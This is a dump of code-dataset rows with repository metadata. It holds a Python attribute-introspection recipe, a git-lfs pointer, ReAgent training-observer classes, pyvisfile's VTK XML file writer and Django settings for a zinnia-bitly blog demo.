__sizeof__ __str__ __subclasshook__ clear copy fromkeys get has_key items
iteritems iterkeys itervalues keys pop popitem setdefault update values viewitems
viewkeys viewvalues
# object attributes of a list:
oa([])
__add__ __class__ __contains__ __delattr__ __delitem__ __delslice__ __doc__ __eq__
__format__ __ge__ __getattribute__ __getitem__ __getslice__ __gt__ __hash__ __iadd__
__imul__ __init__ __iter__ __le__ __len__ __lt__ __mul__ __ne__ __new__
__reduce__ __reduce_ex__ __repr__ __reversed__ __rmul__ __setattr__ __setitem__
__setslice__ __sizeof__ __str__ __subclasshook__ append count extend index insert
pop remove reverse sort
# object attributes of an int:
oa(1)
__abs__ __add__ __and__ __class__ __cmp__ __coerce__ __delattr__ __div__ __divmod__
__doc__ __float__ __floordiv__ __format__ __getattribute__ __getnewargs__ __hash__
__hex__ __index__ __init__ __int__ __invert__ __long__ __lshift__ __mod__
__mul__ __neg__ __new__ __nonzero__ __oct__ __or__ __pos__ __pow__ __radd__ __rand__
__rdiv__ __rdivmod__ __reduce__ __reduce_ex__ __repr__ __rfloordiv__ __rlshift__
__rmod__ __rmul__ __ror__ __rpow__ __rrshift__ __rshift__ __rsub__ __rtruediv__
__rxor__ __setattr__ __sizeof__ __str__ __sub__ __subclasshook__ __truediv__
__trunc__ __xor__ bit_length conjugate denominator imag numerator real
'''
def oar(o):
for at in dir(o):
if not at.startswith('__') and not at.endswith('__'):
print at,
'''
# regular (meaning non-dunder) object attributes of a dict:
oar({})
clear copy fromkeys get has_key items iteritems iterkeys itervalues keys pop popitem
setdefault update values viewitems viewkeys viewvalues
# regular object attributes of an int:
oar(1)
bit_length conjugate denominator imag numerator real
# regular object attributes of a string:
oar('')
_formatter_field_name_split _formatter_parser capitalize center count decode encode
endswith expandtabs find format index isalnum isalpha isdigit islower isspace
istitle isupper join ljust lower lstrip partition replace rfind rindex rjust rpartition
rsplit rstrip split splitlines startswith strip swapcase title translate upper zfill
'''
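The two helpers above use the Python 2 print statement. A Python 3 adaptation that returns lists instead of printing (same `dir()` filter as `oar`), which also makes the helpers easy to reuse:

```python
# Python 3 sketch of the recipe's helpers, returning lists.
def oa3(o):
    """All attribute names of an object, dunders included."""
    return dir(o)

def oar3(o):
    """Only the 'regular' attribute names (same filter as oar above)."""
    return [at for at in dir(o)
            if not at.startswith('__') and not at.endswith('__')]

regular = oar3({})
# e.g. 'keys', 'items' and 'update' appear in `regular`; '__len__' does not
```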
| [
"betty@qburst.com"
] | betty@qburst.com |
117fe1342a3efe8540e633aa9a62d928ac69653d | 8d9318a33afc2c3b5ca8ac99fce0d8544478c94a | /Books/Casandra DB/DataStax/resources/spark/python/examples/wordcount.py | 52f53c6f8b231953db69166e09e3ccc8a4d5cd1c | [] | no_license | tushar239/git-large-repo | e30aa7b1894454bf00546312a3fb595f6dad0ed6 | 9ee51112596e5fc3a7ab2ea97a86ec6adc677162 | refs/heads/master | 2021-01-12T13:48:43.280111 | 2016-11-01T22:14:51 | 2016-11-01T22:14:51 | 69,609,373 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:ca373d7911f67e869369ad2f602e2739ff048b81941c922a74136867cf33a91d
size 1321
| [
"tushar239@gmail.com"
] | tushar239@gmail.com |
1c7e5a7390304c57008517d71539568ca946b451 | 0580861bd8b993ac92faec0ed88a339975d702c0 | /reagent/core/observers.py | 8d56984ae533afe510457644890fada46dbd303f | [
"BSD-3-Clause"
] | permissive | Sandy4321/ReAgent | 346094ae4c98121de5c54d504186f583de21daf0 | 0a387c1aeb922d242c705338fae9379becc82814 | refs/heads/master | 2023-07-17T01:27:17.762206 | 2021-08-19T03:15:15 | 2021-08-19T03:17:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,772 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import logging
from typing import Any, Dict, Iterable, List, Optional
from reagent.core.tensorboardX import SummaryWriterContext
from reagent.core.tracker import Aggregator, Observer
logger = logging.getLogger(__name__)
class CompositeObserver(Observer):
"""
A composite observer which takes care of dispatching values to child observers
"""
def __init__(self, observers: Iterable[Observer]):
self.observers: Dict[str, List[Observer]] = {}
for observer in observers:
observing_keys = observer.get_observing_keys()
for key in observing_keys:
self.observers.setdefault(key, []).append(observer)
super().__init__(list(self.observers))
def update(self, key: str, value):
for observer in self.observers[key]:
observer.update(key, value)
class EpochEndObserver(Observer):
"""
Call the callback function with epoch # when the epoch ends
"""
def __init__(self, callback, key: str = "epoch_end"):
super().__init__(observing_keys=[key])
self.callback = callback
def update(self, key: str, value):
self.callback(value)
class ValueListObserver(Observer):
"""
Simple observer that collect values into a list
"""
def __init__(self, observing_key: str):
super().__init__(observing_keys=[observing_key])
self.observing_key = observing_key
self.values: List[Any] = []
def update(self, key: str, value):
self.values.append(value)
def reset(self):
self.values = []
class TensorBoardScalarObserver(Observer):
def __init__(self, key: str, logging_key: Optional[str]):
super().__init__(observing_keys=[key])
self.key = key
self.logging_key = logging_key or key
def update(self, key: str, value):
SummaryWriterContext.add_scalar(self.logging_key, value)
class IntervalAggregatingObserver(Observer):
def __init__(
self,
interval: Optional[int],
aggregator: Aggregator,
observe_epoch_end: bool = True,
):
self.key = aggregator.key
obs_keys = ["epoch_end"] if observe_epoch_end else []
obs_keys.append(self.key)
super().__init__(observing_keys=obs_keys)
self.iteration = 0
self.interval = interval
self.intermediate_values: List[Any] = []
self.aggregator = aggregator
def update(self, key: str, value):
if key == "epoch_end":
self.flush()
return
self.intermediate_values.append(value)
self.iteration += 1
# pyre-fixme[58]: `%` is not supported for operand types `int` and
# `Optional[int]`.
if self.interval and self.iteration % self.interval == 0:
logger.info(
"Aggregating values over the recent interval for %s at iteration %s; aggregator: %s",
self.key,
self.iteration,
self.aggregator.__class__.__name__,
)
self.aggregator(self.key, self.intermediate_values)
self.intermediate_values = []
def flush(self):
# We need to reset iteration here to avoid aggregating on the same data multiple
# times
logger.info(
f"Interval Agg. Flushing: {self.key}; iteration: {self.iteration}; "
f"aggregator: {self.aggregator.__class__.__name__}; points: {len(self.intermediate_values)}"
)
self.iteration = 0
if self.intermediate_values:
self.aggregator(self.key, self.intermediate_values)
self.intermediate_values = []
self.aggregator.flush()
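`IntervalAggregatingObserver` above buffers incoming values and hands them to its aggregator every `interval` updates, plus once more at epoch end. A framework-free sketch of that pattern (a simplified stand-in, not the class's actual API — it counts buffered values rather than keeping a separate iteration counter):

```python
# Sketch of the interval-aggregation pattern: buffer values, reduce
# them every `interval` updates, and emit any leftovers on flush().
class IntervalAggregator:
    def __init__(self, interval, aggregate_fn):
        self.interval = interval
        self.aggregate_fn = aggregate_fn   # called with the buffered values
        self.buffer = []
        self.results = []

    def update(self, value):
        self.buffer.append(value)
        if self.interval and len(self.buffer) % self.interval == 0:
            self._aggregate()

    def flush(self):
        # mirror of IntervalAggregatingObserver.flush(): emit leftovers
        if self.buffer:
            self._aggregate()

    def _aggregate(self):
        self.results.append(self.aggregate_fn(self.buffer))
        self.buffer = []

agg = IntervalAggregator(3, lambda vals: sum(vals) / len(vals))
for v in [1, 2, 3, 4, 5]:
    agg.update(v)
agg.flush()
# agg.results == [2.0, 4.5]: mean of [1, 2, 3], then mean of [4, 5]
```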
| [
"facebook-github-bot@users.noreply.github.com"
] | facebook-github-bot@users.noreply.github.com |
a2d865f534068e41894553b999aeceab60ce73c0 | 6d54c57d0ec958158b48be3aa46fe717b507d378 | /pyvisfile/vtk/__init__.py | 589fd52966ef9af146a413614df3eef7806a8b5b | [
"MIT"
] | permissive | cstatz/pyvisfile | e368a82caaec495a5fbfbc2d45b9d773427f0e49 | a724f77da5cd46842f0ba313ac0ba1f86f3842c5 | refs/heads/master | 2021-01-18T11:17:40.212432 | 2013-08-29T10:29:42 | 2013-08-29T10:29:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 18,175 | py | """Generic support for new-style (XML) VTK visualization data files."""
__copyright__ = "Copyright (C) 2007 Andreas Kloeckner"
import numpy as np
VTK_INT8 = "Int8"
VTK_UINT8 = "UInt8"
VTK_INT16 = "Int16"
VTK_UINT16 = "UInt16"
VTK_INT32 = "Int32"
VTK_UINT32 = "UInt32"
VTK_INT64 = "Int64"
VTK_UINT64 = "UInt64"
VTK_FLOAT32 = "Float32"
VTK_FLOAT64 = "Float64"
VTK_VERTEX = 1
VTK_POLY_VERTEX = 2
VTK_LINE = 3
VTK_POLY_LINE = 4
VTK_TRIANGLE = 5
VTK_TRIANGLE_STRIP = 6
VTK_POLYGON = 7
VTK_PIXEL = 8
VTK_QUAD = 9
VTK_TETRA = 10
VTK_VOXEL = 11
VTK_HEXAHEDRON = 12
VTK_WEDGE = 13
VTK_PYRAMID = 14
CELL_NODE_COUNT = {
VTK_VERTEX: 1,
# VTK_POLY_VERTEX: no a-priori size
VTK_LINE: 2,
# VTK_POLY_LINE: no a-priori size
VTK_TRIANGLE: 3,
# VTK_TRIANGLE_STRIP: no a-priori size
# VTK_POLYGON: no a-priori size
VTK_PIXEL: 4,
VTK_QUAD: 4,
VTK_TETRA: 4,
VTK_VOXEL: 8,
VTK_HEXAHEDRON: 8,
VTK_WEDGE: 6,
VTK_PYRAMID: 5,
}
VF_LIST_OF_COMPONENTS = 0  # [[x0,x1], [y0,y1], [z0,z1]]
VF_LIST_OF_VECTORS = 1  # [[x0,y0,z0], [x1,y1,z1]]
_U32CHAR = np.dtype(np.uint32).char
# Ah, the joys of home-baked non-compliant XML goodness.
class XMLElementBase(object):
def __init__(self):
self.children = []
def copy(self, new_children=None):
result = self.__class__(self.tag, self.attributes)
if new_children is not None:
result.children = new_children
else:
result.children = self.children
return result
def add_child(self, child):
self.children.append(child)
class XMLElement(XMLElementBase):
def __init__(self, tag, **attributes):
XMLElementBase.__init__(self)
self.tag = tag
self.attributes = attributes
def write(self, file):
attr_string = "".join(
" %s=\"%s\"" % (key,value)
for key,value in self.attributes.iteritems())
if self.children:
file.write("<%s%s>\n" % (self.tag, attr_string))
for child in self.children:
if isinstance(child, XMLElement):
child.write(file)
else:
# likely a string instance, write it directly
file.write(child)
file.write("</%s>\n" % self.tag)
else:
file.write("<%s%s/>\n" % (self.tag, attr_string))
class XMLRoot(XMLElementBase):
def __init__(self, child=None):
XMLElementBase.__init__(self)
if child:
self.add_child(child)
def write(self, file):
file.write("<?xml version=\"1.0\"?>\n")
for child in self.children:
if isinstance(child, XMLElement):
child.write(file)
else:
# likely a string instance, write it directly
file.write(child)
class EncodedBuffer:
def encoder(self):
"""Return an identifier for the binary encoding used."""
raise NotImplementedError
def compressor(self):
"""Return an identifier for the compressor used, or None."""
raise NotImplementedError
def raw_buffer(self):
"""Reobtain the raw buffer string object that was used to
construct this encoded buffer."""
raise NotImplementedError
def add_to_xml_element(self, xml_element):
"""Add encoded buffer to the given *xml_element*
Return total size of encoded buffer in bytes."""
raise NotImplementedError
class BinaryEncodedBuffer:
def __init__(self, buffer):
self.buffer = buffer
def encoder(self):
return "binary"
def compressor(self):
return None
def raw_buffer(self):
return self.buffer
def add_to_xml_element(self, xml_element):
raise NotImplementedError
class Base64EncodedBuffer:
def __init__(self, buffer):
from struct import pack
from base64 import b64encode
self.b64header = b64encode(
pack(_U32CHAR, len(buffer)))
self.b64data = b64encode(buffer)
def encoder(self):
return "base64"
def compressor(self):
return None
def raw_buffer(self):
from base64 import b64decode
return b64decode(self.b64data)
def add_to_xml_element(self, xml_element):
"""Add encoded buffer to the given *xml_element*.
Return total size of encoded buffer in bytes."""
xml_element.add_child(self.b64header)
xml_element.add_child(self.b64data)
return len(self.b64header) + len(self.b64data)
class Base64ZLibEncodedBuffer:
def __init__(self, buffer):
from struct import pack
from base64 import b64encode
from zlib import compress
comp_buffer = compress(buffer)
comp_header = [1, len(buffer), len(buffer), len(comp_buffer)]
self.b64header = b64encode(
pack(_U32CHAR*len(comp_header), *comp_header))
self.b64data = b64encode(comp_buffer)
def encoder(self):
return "base64"
def compressor(self):
return "zlib"
def raw_buffer(self):
from base64 import b64decode
from zlib import decompress
return decompress(b64decode(self.b64data))
def add_to_xml_element(self, xml_element):
"""Add encoded buffer to the given *xml_element*.
Return total size of encoded buffer in bytes."""
xml_element.add_child(self.b64header)
xml_element.add_child(self.b64data)
return len(self.b64header) + len(self.b64data)
class DataArray(object):
def __init__(self, name, container, vector_padding=3,
vector_format=VF_LIST_OF_COMPONENTS, components=None):
self.name = name
if isinstance(container, DataArray):
self.type = container.type
self.components = container.components
self.encoded_buffer = container.encoded_buffer
return
def vec_type(vec):
if vec.dtype == np.int8: return VTK_INT8
elif vec.dtype == np.uint8: return VTK_UINT8
elif vec.dtype == np.int16: return VTK_INT16
elif vec.dtype == np.uint16: return VTK_UINT16
elif vec.dtype == np.int32: return VTK_INT32
elif vec.dtype == np.uint32: return VTK_UINT32
elif vec.dtype == np.int64: return VTK_INT64
elif vec.dtype == np.uint64: return VTK_UINT64
elif vec.dtype == np.float32: return VTK_FLOAT32
elif vec.dtype == np.float64: return VTK_FLOAT64
else:
                raise TypeError(
                        "Unsupported vector type '%s' in VTK writer"
                        % vec.dtype)
        if not isinstance(container, np.ndarray):
            raise TypeError("expected numpy array, got '%s' instead"
                    % type(container))
if container.dtype == object:
for subvec in container:
if not isinstance(subvec, np.ndarray):
raise TypeError("expected numpy array, got '%s' instead"
% type(subvec))
container = np.array(list(container))
assert container.dtype != object
if len(container.shape) > 1:
if vector_format == VF_LIST_OF_COMPONENTS:
container = container.T.copy()
assert len(container.shape) == 2, "numpy vectors of rank >2 are not supported"
assert container.strides[1] == container.itemsize, "2D numpy arrays must be row-major"
if vector_padding > container.shape[1]:
container = np.asarray(np.hstack((
container,
np.zeros((
container.shape[0],
vector_padding-container.shape[1],
),
container.dtype))), order="C")
self.components = container.shape[1]
else:
self.components = 1
self.type = vec_type(container)
if not container.flags.c_contiguous:
container = container.copy()
buf = buffer(container)
self.encoded_buffer = BinaryEncodedBuffer(buf)
def get_encoded_buffer(self, encoder, compressor):
have_encoder = self.encoded_buffer.encoder()
have_compressor = self.encoded_buffer.compressor()
if (encoder, compressor) != (have_encoder, have_compressor):
raw_buf = self.encoded_buffer.raw_buffer()
# avoid having three copies of the buffer around temporarily
del self.encoded_buffer
if (encoder, compressor) == ("binary", None):
self.encoded_buffer = BinaryEncodedBuffer(raw_buf)
elif (encoder, compressor) == ("base64", None):
self.encoded_buffer = Base64EncodedBuffer(raw_buf)
elif (encoder, compressor) == ("base64", "zlib"):
self.encoded_buffer = Base64ZLibEncodedBuffer(raw_buf)
            else:
                # restore a usable buffer before reporting the bad request
                self.encoded_buffer = BinaryEncodedBuffer(raw_buf)
                raise ValueError("invalid encoder/compressor pair")
have_encoder = self.encoded_buffer.encoder()
have_compressor = self.encoded_buffer.compressor()
assert (encoder, compressor) == (have_encoder, have_compressor)
return self.encoded_buffer
def encode(self, compressor, xml_element):
ebuf = self.get_encoded_buffer("base64", compressor)
return ebuf.add_to_xml_element(xml_element)
def invoke_visitor(self, visitor):
return visitor.gen_data_array(self)
class UnstructuredGrid(object):
def __init__(self, points, cells, cell_types):
        self.point_count, self.points = points
assert self.points.name == "points"
try:
self.cell_count, self.cell_connectivity, \
self.cell_offsets = cells
        except (TypeError, ValueError):
            # "cells" was a flat connectivity array, not a
            # (count, connectivity, offsets) tuple
self.cell_count = len(cell_types)
offsets = np.cumsum(np.fromiter(
(CELL_NODE_COUNT[ct] for ct in cell_types),
dtype=np.int,
count=len(cell_types)))
self.cell_connectivity = DataArray("connectivity", cells)
self.cell_offsets = DataArray("offsets", offsets)
self.cell_types = DataArray("types", cell_types)
self.pointdata = []
self.celldata = []
def copy(self):
return UnstructuredGrid(
(self.point_count, self.points),
(self.cell_count, self.cell_connectivity,
self.cell_offsets),
self.cell_types)
def vtk_extension(self):
return "vtu"
def invoke_visitor(self, visitor):
return visitor.gen_unstructured_grid(self)
def add_pointdata(self, data_array):
self.pointdata.append(data_array)
def add_celldata(self, data_array):
self.celldata.append(data_array)
class StructuredGrid(object):
def __init__(self, mesh):
self.mesh = mesh
if mesh.shape[0] != 3:
raise ValueError("Mesh must consist of three-dimensional points")
self.shape = mesh.shape[1:]
self.points = DataArray(
"points", mesh.T.copy().reshape(-1, 3),
vector_format=VF_LIST_OF_VECTORS)
self.pointdata = []
self.celldata = []
def copy(self):
return StructuredGrid(self.mesh)
def vtk_extension(self):
return "vts"
def invoke_visitor(self, visitor):
return visitor.gen_structured_grid(self)
def add_pointdata(self, data_array):
self.pointdata.append(data_array)
def add_celldata(self, data_array):
self.celldata.append(data_array)
def make_vtkfile(filetype, compressor):
import sys
if sys.byteorder == "little":
bo = "LittleEndian"
else:
bo = "BigEndian"
kwargs = {}
if compressor == "zlib":
kwargs["compressor"] = "vtkZLibDataCompressor"
return XMLElement("VTKFile", type=filetype, version="0.1", byte_order=bo, **kwargs)
class XMLGenerator(object):
def __init__(self, compressor=None):
if compressor == "zlib":
try:
import zlib
except ImportError:
                compressor = None
elif compressor is None:
pass
else:
raise ValueError("Invalid compressor name `%s'" % compressor)
self.compressor = compressor
def __call__(self, vtkobj):
child = self.rec(vtkobj)
vtkf = make_vtkfile(child.tag, self.compressor)
vtkf.add_child(child)
return XMLRoot(vtkf)
def rec(self, vtkobj):
return vtkobj.invoke_visitor(self)
class InlineXMLGenerator(XMLGenerator):
def gen_unstructured_grid(self, ugrid):
el = XMLElement("UnstructuredGrid")
piece = XMLElement("Piece",
NumberOfPoints=ugrid.point_count, NumberOfCells=ugrid.cell_count)
el.add_child(piece)
if ugrid.pointdata:
data_el = XMLElement("PointData")
piece.add_child(data_el)
for data_array in ugrid.pointdata:
data_el.add_child(self.rec(data_array))
if ugrid.celldata:
data_el = XMLElement("CellData")
piece.add_child(data_el)
for data_array in ugrid.celldata:
data_el.add_child(self.rec(data_array))
points = XMLElement("Points")
piece.add_child(points)
points.add_child(self.rec(ugrid.points))
cells = XMLElement("Cells")
piece.add_child(cells)
cells.add_child(self.rec(ugrid.cell_connectivity))
cells.add_child(self.rec(ugrid.cell_offsets))
cells.add_child(self.rec(ugrid.cell_types))
return el
def gen_structured_grid(self, sgrid):
extent = []
for dim in range(3):
extent.append(0)
if dim < len(sgrid.shape):
extent.append(sgrid.shape[dim]-1)
else:
                extent.append(0)
extent_str = " ".join(str(i) for i in extent)
el = XMLElement("StructuredGrid", WholeExtent=extent_str)
piece = XMLElement("Piece", Extent=extent_str)
el.add_child(piece)
if sgrid.pointdata:
data_el = XMLElement("PointData")
piece.add_child(data_el)
for data_array in sgrid.pointdata:
data_el.add_child(self.rec(data_array))
if sgrid.celldata:
data_el = XMLElement("CellData")
piece.add_child(data_el)
for data_array in sgrid.celldata:
data_el.add_child(self.rec(data_array))
points = XMLElement("Points")
piece.add_child(points)
points.add_child(self.rec(sgrid.points))
return el
def gen_data_array(self, data):
el = XMLElement("DataArray", type=data.type, Name=data.name,
NumberOfComponents=data.components, format="binary")
data.encode(self.compressor, el)
el.add_child("\n")
return el
class AppendedDataXMLGenerator(InlineXMLGenerator):
def __init__(self, compressor=None):
InlineXMLGenerator.__init__(self, compressor)
self.base64_len = 0
self.app_data = XMLElement("AppendedData", encoding="base64")
self.app_data.add_child("_")
def __call__(self, vtkobj):
xmlroot = XMLGenerator.__call__(self, vtkobj)
self.app_data.add_child("\n")
xmlroot.children[0].add_child(self.app_data)
return xmlroot
def gen_data_array(self, data):
el = XMLElement("DataArray", type=data.type, Name=data.name,
NumberOfComponents=data.components, format="appended",
offset=self.base64_len)
self.base64_len += data.encode(self.compressor, self.app_data)
return el
class ParallelXMLGenerator(XMLGenerator):
def __init__(self, pathnames):
XMLGenerator.__init__(self, compressor=None)
self.pathnames = pathnames
def gen_unstructured_grid(self, ugrid):
el = XMLElement("PUnstructuredGrid")
pointdata = XMLElement("PPointData")
el.add_child(pointdata)
for data_array in ugrid.pointdata:
pointdata.add_child(self.rec(data_array))
points = XMLElement("PPoints")
el.add_child(points)
points.add_child(self.rec(ugrid.points))
cells = XMLElement("PCells")
el.add_child(cells)
cells.add_child(self.rec(ugrid.cell_connectivity))
cells.add_child(self.rec(ugrid.cell_offsets))
cells.add_child(self.rec(ugrid.cell_types))
for pn in self.pathnames:
el.add_child(XMLElement("Piece", Source=pn))
return el
def gen_data_array(self, data):
el = XMLElement("PDataArray", type=data.type, Name=data.name,
NumberOfComponents=data.components)
return el
def write_structured_grid(file_name, mesh, cell_data=[], point_data=[]):
grid = StructuredGrid(mesh)
from pytools.obj_array import with_object_array_or_scalar
def do_reshape(fld):
return fld.T.copy().reshape(-1)
for name, field in cell_data:
reshaped_fld = with_object_array_or_scalar(do_reshape, field,
obj_array_only=True)
        grid.add_celldata(DataArray(name, reshaped_fld))
for name, field in point_data:
reshaped_fld = with_object_array_or_scalar(do_reshape, field,
obj_array_only=True)
grid.add_pointdata(DataArray(name, reshaped_fld))
from os.path import exists
if exists(file_name):
raise RuntimeError("output file '%s' already exists"
% file_name)
outf = open(file_name, "w")
AppendedDataXMLGenerator()(grid).write(outf)
outf.close()
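The encoding scheme implemented by `Base64ZLibEncodedBuffer` above — a packed header of four native `uint32` values `[n_blocks, uncompressed_len, uncompressed_len, compressed_len]` followed by the zlib-compressed payload, both base64-encoded — can be exercised in isolation with just the standard library. This round-trip sketch mirrors the class rather than importing it; the `encode`/`decode` helper names are illustrative:

```python
import zlib
from base64 import b64decode, b64encode
from struct import pack, unpack

U32 = "I"  # native uint32 format character, matching _U32CHAR above


def encode(buf):
    # header: [n_blocks, uncompressed_len, uncompressed_len, compressed_len]
    comp = zlib.compress(buf)
    header = pack(U32 * 4, 1, len(buf), len(buf), len(comp))
    return b64encode(header), b64encode(comp)


def decode(b64header, b64data):
    n_blocks, raw_len, _, comp_len = unpack(U32 * 4, b64decode(b64header))
    comp = b64decode(b64data)
    assert n_blocks == 1 and comp_len == len(comp)
    raw = zlib.decompress(comp)
    assert len(raw) == raw_len
    return raw


payload = b"\x00\x01" * 1000
header, data = encode(payload)
assert decode(header, data) == payload
```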
| [
"inform@tiker.net"
] | inform@tiker.net |
097955982d9a4cd85cd972d01f493310df17eb98 | 43206144544e89d1510f8f77c443735200222f27 | /demo_zinnia_bitly/settings.py | 721a88ca90133e533008ec7ec45dec0e08e651fe | [
"BSD-3-Clause"
] | permissive | SteveByerly/zinnia-url-shortener-bitly | e655aa4bb4b560a67a28c84c2ddf9126d4904f7b | 67bf0681e3d16bf27c05cc0a91229cdc1ad3fb8e | refs/heads/develop | 2021-01-21T08:38:20.303625 | 2015-04-20T23:23:46 | 2015-04-20T23:23:46 | 34,291,673 | 0 | 0 | null | 2015-04-20T23:13:25 | 2015-04-20T23:13:25 | null | UTF-8 | Python | false | false | 2,440 | py | """Settings for the zinnia-bitly demo"""
import os
gettext = lambda s: s
DEBUG = True
TEMPLATE_DEBUG = DEBUG
DATABASES = {'default':
{'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(os.path.dirname(__file__), 'demo.db')}
}
TIME_ZONE = 'Europe/Paris'
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
SECRET_KEY = 'jo-1rzm(%sf)3#n+fa7j945yuv3(pt63abhi12_t7e^^5q8dyw'
USE_TZ = True
USE_I18N = True
USE_L10N = True
SITE_ID = 1
LANGUAGE_CODE = 'en'
LANGUAGES = (
('en', gettext('English')),
('fr', gettext('French')),
('de', gettext('German')),
('es', gettext('Spanish')),
('it', gettext('Italian')),
('nl', gettext('Dutch')),
('sl', gettext('Slovenian')),
('bg', gettext('Bulgarian')),
('hu', gettext('Hungarian')),
('cs', gettext('Czech')),
('sk', gettext('Slovak')),
('lt', gettext('Lithuanian')),
('ru', gettext('Russian')),
('pl', gettext('Polish')),
('eu', gettext('Basque')),
('he', gettext('Hebrew')),
('ca', gettext('Catalan')),
('tr', gettext('Turkish')),
('sv', gettext('Swedish')),
('hr_HR', gettext('Croatian')),
('pt_BR', gettext('Brazilian Portuguese')),
('fi_FI', gettext('Finnish (Finland)')),
('zh_CN', gettext('Simplified Chinese')),
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'demo_zinnia_bitly.urls'
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.i18n',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'zinnia.context_processors.version',
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.sitemaps',
'django.contrib.comments',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.sites',
'django.contrib.admin',
'django.contrib.staticfiles',
'mptt',
'zinnia',
'tagging',
'django_bitly',
)
ZINNIA_URL_SHORTENER_BACKEND = 'zinnia_bitly'
BITLY_LOGIN = 'YOUR_LOGIN'
BITLY_API_KEY = 'YOUR_API_KEY'
| [
"fantomas42@gmail.com"
] | fantomas42@gmail.com |